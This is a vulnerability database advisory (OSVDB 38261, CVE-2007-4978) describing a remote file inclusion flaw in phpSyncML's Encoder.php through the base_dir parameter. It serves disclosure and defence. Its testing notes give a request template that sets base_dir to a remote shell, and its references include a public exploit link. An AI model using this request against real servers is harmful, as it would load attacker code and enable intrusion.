phpSyncML WBXML/Encoder.php base_dir Variable Remote File Inclusion

2007-09-18T00:00:00
ID OSVDB:38261
Type osvdb
Reporter OSVDB
Modified 2007-09-18T00:00:00

Description

Manual Testing Notes

[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell]

References:

Related OSVDB ID: 38260 ISS X-Force ID: 36665 Generic Exploit URL: http://www.milw0rm.com/exploits/4421 CVE-2007-4978 Bugtraq ID: 25701